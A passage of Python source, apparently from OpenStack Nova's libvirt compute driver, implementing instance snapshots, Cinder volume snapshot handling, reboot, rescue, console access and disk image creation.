# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
self._image_api.update(context,
image_id,
metadata,
image_file)
LOG.info(_LI("Snapshot image upload complete"),
instance=instance)
@staticmethod
def _wait_for_block_job(domain, disk_path, abort_on_error=False,
wait_for_job_clean=False):
"""Wait for libvirt block job to complete.
Libvirt may return either cur==end or an empty dict when
the job is complete, depending on whether the job has been
cleaned up by libvirt yet, or not.
:returns: True if still in progress
False if completed
"""
status = domain.blockJobInfo(disk_path, 0)
if status == -1 and abort_on_error:
msg = _('libvirt error while requesting blockjob info.')
raise exception.NovaException(msg)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if wait_for_job_clean:
job_ended = not status
else:
job_ended = cur == end
return not job_ended
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's persistent XML file
xml = domain.XMLDesc(
libvirt.VIR_DOMAIN_XML_INACTIVE |
libvirt.VIR_DOMAIN_XML_SECURE)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
# NOTE (rmk): We are using shallow rebases as a workaround to a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2',
out_path, image_format)
def _volume_snapshot_update_status(self, context, snapshot_id, status):
"""Send a snapshot status update to Cinder.
This method captures and logs exceptions that occur
since callers cannot do anything useful with these exceptions.
Operations on the Cinder side waiting for this will time out if
a failure occurs sending the update.
:param context: security context
:param snapshot_id: id of snapshot being updated
:param status: new status value
"""
try:
self._volume_api.update_snapshot_status(context,
snapshot_id,
status)
except Exception:
LOG.exception(_LE('Failed to send updated snapshot status '
'to volume service.'))
def _volume_snapshot_create(self, context, instance, domain,
volume_id, snapshot_id, new_file):
"""Perform volume snapshot.
:param domain: VM that volume is attached to
:param volume_id: volume UUID to snapshot
:param snapshot_id: UUID of snapshot being created
:param new_file: relative path to new qcow2 file present on share
"""
xml = domain.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
disks_to_snap = [] # to be snapshotted by libvirt
network_disks_to_snap = [] # network disks (netfs, gluster, etc.)
disks_to_skip = [] # local disks not snapshotted
for guest_disk in device_info.devices:
if (guest_disk.root_name != 'disk'):
continue
if (guest_disk.target_dev is None):
continue
if (guest_disk.serial is None or guest_disk.serial != volume_id):
disks_to_skip.append(guest_disk.target_dev)
continue
# disk is a Cinder volume with the correct volume_id
disk_info = {
'dev': guest_disk.target_dev,
'serial': guest_disk.serial,
'current_file': guest_disk.source_path,
'source_protocol': guest_disk.source_protocol,
'source_name': guest_disk.source_name,
'source_hosts': guest_disk.source_hosts,
'source_ports': guest_disk.source_ports
}
# Determine path for new_file based on current path
if disk_info['current_file'] is not None:
current_file = disk_info['current_file']
new_file_path = os.path.join(os.path.dirname(current_file),
new_file)
disks_to_snap.append((current_file, new_file_path))
elif disk_info['source_protocol'] in ('gluster', 'netfs'):
network_disks_to_snap.append((disk_info, new_file))
if not disks_to_snap and not network_disks_to_snap:
msg = _('Found no disk to snapshot.')
raise exception.NovaException(msg)
snapshot = vconfig.LibvirtConfigGuestSnapshot()
for current_name, new_filename in disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = current_name
snap_disk.source_path = new_filename
snap_disk.source_type = 'file'
snap_disk.snapshot = 'external'
snap_disk.driver_name = 'qcow2'
snapshot.add_disk(snap_disk)
for disk_info, new_filename in network_disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = disk_info['dev']
snap_disk.source_type = 'network'
snap_disk.source_protocol = disk_info['source_protocol']
snap_disk.snapshot = 'external'
snap_disk.source_path = new_filename
old_dir = disk_info['source_name'].split('/')[0]
snap_disk.source_name = '%s/%s' % (old_dir, new_filename)
snap_disk.source_hosts = disk_info['source_hosts']
snap_disk.source_ports = disk_info['source_ports']
snapshot.add_disk(snap_disk)
for dev in disks_to_skip:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = dev
snap_disk.snapshot = 'no'
snapshot.add_disk(snap_disk)
snapshot_xml = snapshot.to_xml()
LOG.debug("snap xml: %s", snapshot_xml)
snap_flags = (libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_DISK_ONLY |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_NO_METADATA |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_REUSE_EXT)
QUIESCE = libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_QUIESCE
try:
domain.snapshotCreateXML(snapshot_xml,
snap_flags | QUIESCE)
return
except libvirt.libvirtError:
LOG.exception(_LE('Unable to create quiesced VM snapshot, '
'attempting again with quiescing disabled.'))
try:
domain.snapshotCreateXML(snapshot_xml, snap_flags)
except libvirt.libvirtError:
LOG.exception(_LE('Unable to create VM snapshot, '
'failing volume_snapshot operation.'))
raise
def _volume_refresh_connection_info(self, context, instance, volume_id):
bdm = objects.BlockDeviceMapping.get_by_volume_id(context,
volume_id)
driver_bdm = driver_block_device.DriverVolumeBlockDevice(bdm)
driver_bdm.refresh_connection_info(context, instance,
self._volume_api, self)
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
"""Create snapshots of a Cinder volume via libvirt.
:param instance: VM instance object reference
:param volume_id: id of volume being snapshotted
:param create_info: dict of information used to create snapshots
- snapshot_id : ID of snapshot
- type : qcow2 / <other>
- new_file : qcow2 file created by Cinder which
becomes the VM's active image after
the snapshot is complete
"""
LOG.debug("volume_snapshot_create: create_info: %(c_info)s",
{'c_info': create_info}, instance=instance)
try:
virt_dom = self._lookup_by_name(instance.name)
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance.uuid)
if create_info['type'] != 'qcow2':
raise exception.NovaException(_('Unknown type: %s') %
create_info['type'])
snapshot_id = create_info.get('snapshot_id', None)
if snapshot_id is None:
raise exception.NovaException(_('snapshot_id required '
'in create_info'))
try:
self._volume_snapshot_create(context, instance, virt_dom,
volume_id, snapshot_id,
create_info['new_file'])
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Error occurred during '
'volume_snapshot_create, '
'sending error status to Cinder.'))
self._volume_snapshot_update_status(
context, snapshot_id, 'error')
self._volume_snapshot_update_status(
context, snapshot_id, 'creating')
def _wait_for_snapshot():
snapshot = self._volume_api.get_snapshot(context, snapshot_id)
if snapshot.get('status') != 'creating':
self._volume_refresh_connection_info(context, instance,
volume_id)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_snapshot)
timer.start(interval=0.5).wait()
def _volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info=None):
"""Note:
if file being merged into == active image:
do a blockRebase (pull) operation
else:
do a blockCommit operation
Files must be adjacent in snap chain.
:param instance: instance object reference
:param volume_id: volume UUID
:param snapshot_id: snapshot UUID (unused currently)
:param delete_info: {
'type': 'qcow2',
'file_to_merge': 'a.img',
'merge_target_file': 'b.img' or None (if merging file_to_merge into
active image)
}
Libvirt blockjob handling required for this method is broken
in versions of libvirt that do not contain:
http://libvirt.org/git/?p=libvirt.git;h=0f9e67bfad (1.1.1)
(Patch is pending in 1.0.5-maint branch as well, but we cannot detect
libvirt 1.0.5.5 vs. 1.0.5.6 here.)
"""
if not self._has_min_version(MIN_LIBVIRT_BLOCKJOBINFO_VERSION):
ver = '.'.join([str(x) for x in MIN_LIBVIRT_BLOCKJOBINFO_VERSION])
msg = _("Libvirt '%s' or later is required for online deletion "
"of volume snapshots.") % ver
raise exception.Invalid(msg)
LOG.debug('volume_snapshot_delete: delete_info: %s', delete_info)
if delete_info['type'] != 'qcow2':
msg = _('Unknown delete_info type %s') % delete_info['type']
raise exception.NovaException(msg)
try:
virt_dom = self._lookup_by_name(instance.name)
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance.uuid)
# Find dev name
my_dev = None
active_disk = None
xml = virt_dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
active_disk_object = None
for guest_disk in device_info.devices:
if (guest_disk.root_name != 'disk'):
continue
if (guest_disk.target_dev is None or guest_disk.serial is None):
continue
if guest_disk.serial == volume_id:
my_dev = guest_disk.target_dev
active_disk = guest_disk.source_path
active_protocol = guest_disk.source_protocol
active_disk_object = guest_disk
break
if my_dev is None or (active_disk is None and active_protocol is None):
msg = _('Disk with id: %s '
'not found attached to instance.') % volume_id
LOG.debug('Domain XML: %s', xml)
raise exception.NovaException(msg)
LOG.debug("found device at %s", my_dev)
def _get_snap_dev(filename, backing_store):
if filename is None:
msg = _('filename cannot be None')
raise exception.NovaException(msg)
# libgfapi delete
LOG.debug("XML: %s" % xml)
LOG.debug("active disk object: %s" % active_disk_object)
# determine reference within backing store for desired image
filename_to_merge = filename
matched_name = None
b = backing_store
index = None
current_filename = active_disk_object.source_name.split('/')[1]
if current_filename == filename_to_merge:
return my_dev + '[0]'
while b is not None:
source_filename = b.source_name.split('/')[1]
if source_filename == filename_to_merge:
LOG.debug('found match: %s' % b.source_name)
matched_name = b.source_name
index = b.index
break
b = b.backing_store
if matched_name is None:
msg = _('no match found for %s') % (filename_to_merge)
raise exception.NovaException(msg)
LOG.debug('index of match (%s) is %s' % (b.source_name, index))
my_snap_dev = '%s[%s]' % (my_dev, index)
return my_snap_dev
if delete_info['merge_target_file'] is None:
# pull via blockRebase()
# Merge the most recent snapshot into the active image
rebase_disk = my_dev
rebase_flags = 0
rebase_base = delete_info['file_to_merge'] # often None
if active_protocol is not None:
rebase_base = _get_snap_dev(delete_info['file_to_merge'],
active_disk_object.backing_store)
rebase_bw = 0
LOG.debug('disk: %(disk)s, base: %(base)s, '
'bw: %(bw)s, flags: %(flags)s',
{'disk': rebase_disk,
'base': rebase_base,
'bw': rebase_bw,
'flags': rebase_flags})
result = virt_dom.blockRebase(rebase_disk, rebase_base,
rebase_bw, rebase_flags)
if result == 0:
LOG.debug('blockRebase started successfully')
while self._wait_for_block_job(virt_dom, my_dev,
abort_on_error=True):
LOG.debug('waiting for blockRebase job completion')
time.sleep(0.5)
else:
# commit with blockCommit()
my_snap_base = None
my_snap_top = None
commit_disk = my_dev
commit_flags = 0
if active_protocol is not None:
my_snap_base = _get_snap_dev(delete_info['merge_target_file'],
active_disk_object.backing_store)
my_snap_top = _get_snap_dev(delete_info['file_to_merge'],
active_disk_object.backing_store)
try:
commit_flags |= libvirt.VIR_DOMAIN_BLOCK_COMMIT_RELATIVE
except AttributeError:
ver = '.'.join(
[str(x) for x in
MIN_LIBVIRT_BLOCKCOMMIT_RELATIVE_VERSION])
msg = _("Relative blockcommit support was not detected. "
"Libvirt '%s' or later is required for online "
"deletion of network storage-backed volume "
"snapshots.") % ver
raise exception.Invalid(msg)
commit_base = my_snap_base or delete_info['merge_target_file']
commit_top = my_snap_top or delete_info['file_to_merge']
bandwidth = 0
LOG.debug('will call blockCommit with commit_disk=%(commit_disk)s '
'commit_base=%(commit_base)s '
'commit_top=%(commit_top)s '
% {'commit_disk': commit_disk,
'commit_base': commit_base,
'commit_top': commit_top})
result = virt_dom.blockCommit(commit_disk, commit_base, commit_top,
bandwidth, commit_flags)
if result == 0:
LOG.debug('blockCommit started successfully')
while self._wait_for_block_job(virt_dom, my_dev,
abort_on_error=True):
LOG.debug('waiting for blockCommit job completion')
time.sleep(0.5)
def volume_snapshot_delete(self, context, instance, volume_id, snapshot_id,
delete_info):
try:
self._volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info=delete_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Error occurred during '
'volume_snapshot_delete, '
'sending error status to Cinder.'))
self._volume_snapshot_update_status(
context, snapshot_id, 'error_deleting')
self._volume_snapshot_update_status(context, snapshot_id, 'deleting')
self._volume_refresh_connection_info(context, instance, volume_id)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
try:
soft_reboot_success = self._soft_reboot(instance)
except libvirt.libvirtError as e:
LOG.debug("Instance soft reboot failed: %s", e)
soft_reboot_success = False
if soft_reboot_success:
LOG.info(_LI("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_LW("Failed to soft reboot instance. "
"Trying hard reboot."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
succeeds if the guest responds to acpi. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
state = LIBVIRT_POWER_STATE[dom.info()[0]]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
# NOTE(vish): This actually could take slightly longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
for x in xrange(CONF.libvirt.wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
state = LIBVIRT_POWER_STATE[dom.info()[0]]
new_domid = dom.ID()
# NOTE(ivoks): By checking domain IDs, we make sure we are
# not recreating domain that's already running.
if old_domid != new_domid:
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_LI("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running, instance)
timer.start(interval=0.5).wait()
return True
else:
LOG.info(_LI("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
If xml is set, it uses the passed in xml in place of the xml from the
existing domain.
"""
self._destroy(instance)
# Get the system metadata from the instance
system_meta = utils.instance_sys_meta(instance)
# Convert the system metadata to image metadata
image_meta = utils.get_image_from_system_metadata(system_meta)
if not image_meta:
image_ref = instance.get('image_ref')
image_meta = compute_utils.get_image_metadata(context,
self._image_api,
image_ref,
instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
# NOTE(vish): This could generate the wrong device_format if we are
# using the raw backend and the images don't exist yet.
# The create_images_and_backing below doesn't properly
# regenerate raw backend images, however, so when it
# does we need to (re)generate the xml after the images
# are in place.
xml = self._get_guest_xml(context, instance, network_info, disk_info,
image_meta=image_meta,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self._get_instance_disk_info(instance['name'], xml,
block_device_info)
instance_dir = libvirt_utils.get_instance_path(instance)
self._create_images_and_backing(context, instance, instance_dir,
disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, reboot=True,
vifs_already_plugged=True)
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance rebooted successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def power_off(self, instance):
"""Power off the specified instance."""
self._destroy(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
# We use _hard_reboot here to ensure that all backing files,
# network, and block device connections, etc. are established
# and available before we attempt to start the instance.
self._hard_reboot(context, instance, network_info, block_device_info)
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
self._detach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
dom.managedSave(0)
def resume(self, context, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
dom = self._create_domain_and_network(context, xml, instance,
network_info, block_device_info=block_device_info,
vifs_already_plugged=True)
self._attach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
try:
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.NOSTATE,
power_state.PAUSED)
if state in ignored_states:
return
except exception.NovaException:
pass
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
should not edit or over-ride the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
if image_meta is not None:
rescue_image_id = image_meta.get('id')
else:
rescue_image_id = None
rescue_images = {
'image_id': (rescue_image_id or
CONF.libvirt.rescue_image_id or instance.image_ref),
'kernel_id': (CONF.libvirt.rescue_kernel_id or
instance.kernel_id),
'ramdisk_id': (CONF.libvirt.rescue_ramdisk_id or
instance.ramdisk_id),
}
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
None,
image_meta,
rescue=True)
self._create_image(context, instance,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
image_meta, rescue=rescue_images,
write_to_disk=True)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance.name)
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self._get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
# NOTE(ilyaalekseyev): Implementation like in multinics
# for xenapi(tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
self._create_image(context, instance,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
xml = self._get_guest_xml(context, instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info)
LOG.debug("Instance is running", instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance spawned successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_LI('data: %(data)r, fpath: %(fpath)r'),
{'data': data, 'fpath': fpath})
with open(fpath, 'a+') as fp:
fp.write(data)
return fpath
def get_console_output(self, context, instance):
virt_dom = self._lookup_by_name(instance.name)
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_LI('Truncated console log returned, '
'%d bytes ignored'), remaining,
instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_LI('Truncated console log returned, '
'%d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, context, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
# NOTE(rmk): We had VNC consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='vnc')
port = get_vnc_port_for_instance(instance.name)
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
def get_spice_console(self, context, instance):
def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
# NOTE(rmk): We had Spice consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='spice')
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
if not hasattr(os, 'O_DIRECT'):
LOG.debug("This python runtime does not support direct I/O")
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
# Check is the write allowed with 512 byte alignment
align_size = 512
m = mmap.mmap(-1, align_size)
m.write(r"x" * align_size)
os.write(f, m)
os.close(f)
LOG.debug("Path '%(path)s' supports direct I/O",
{'path': dirpath})
except OSError as e:
if e.errno == errno.EINVAL:
LOG.debug("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'", {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'"),
{'path': dirpath, 'ex': str(e)})
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'"), {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
def _create_ephemeral(self, target, ephemeral_size,
fs_label, os_type, is_block_dev=False,
max_size=None, specified_fs=None):
if not is_block_dev:
self._create_local(target, ephemeral_size)
# Run as root only for block devices.
disk.mkfs(os_type, fs_label, target, run_as_root=is_block_dev,
specified_fs=specified_fs)
@staticmethod
def _create_swap(target, swap_mb, max_size=None):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
@staticmethod
def _get_disk_config_path(instance, suffix=''):
return os.path.join(libvirt_utils.get_instance_path(instance),
'disk.config' + suffix)
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _chown_disk_config_for_instance(self, instance):
disk_config = self._get_disk_config_path(instance)
if os.path.exists(disk_config):
libvirt_utils.chown(disk_config, os.getuid())
@staticmethod
def _is_booted_from_volume(instance, disk_mapping):
"""Determines whether the VM is booting from volume
Determines whether the disk mapping indicates that the VM
is booting from a volume.
"""
return ((not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping)
def _inject_data(self, instance, network_info, admin_pass, files, suffix):
"""Injects data in a disk image
Helper used for injecting data in a disk image file system.
Keyword arguments:
instance -- a dict that refers instance specifications
network_info -- a dict that refers network speficications
admin_pass -- a string used to set an admin password
files -- a list of files needs to be injected
suffix -- a string used as an image name suffix
"""
# Handles the partition need to be used.
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt.inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt.virt_type == 'lxc':
target_partition = None
# Handles the key injection.
if CONF.libvirt.inject_key and instance.get('key_data'):
key = str(instance['key_data'])
else:
key = None
# Handles the admin password injection.
if not CONF.libvirt.inject_password:
admin_pass = None
# Handles the network injection.
net = netutils.get_injected_network_template(
network_info, libvirt_virt_type=CONF.libvirt.virt_type)
# Handles the metadata injection
metadata = instance.get('metadata')
image_type = CONF.libvirt.images_type
if any((key, net, metadata, admin_pass, files)):
injection_image = self.image_backend.image(
instance,
'disk' + suffix,
image_type)
img_id = instance['image_ref']
if not injection_image.check_image_exists():
LOG.warn(_LW('Image %s not found on disk storage. '
'Continue without injecting data'),
injection_image.path, instance=instance)
return
try:
disk.inject_data(injection_image.path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error injecting data into image '
'%(img_id)s (%(e)s)'),
{'img_id': img_id, 'e': e},
instance=instance)
def _create_image(self, context, instance,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None,
admin_pass=None, inject_files=True):
if not suffix:
suffix = ''
booted_from_volume = self._is_booted_from_volume(
instance, disk_mapping)
def image(fname, image_type=CONF.libvirt.images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
# ensure directories exist and are writable
fileutils.ensure_tree(libvirt_utils.get_instance_path(instance))
LOG.info(_LI('Creating image'), instance=instance)
# NOTE(dprince): for rescue console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
# NOTE(yaguang): For evacuate disk.config already exist in shared
# storage, chown it.
self._chown_disk_config_for_instance(instance)
# NOTE(vish): No need add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 7)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
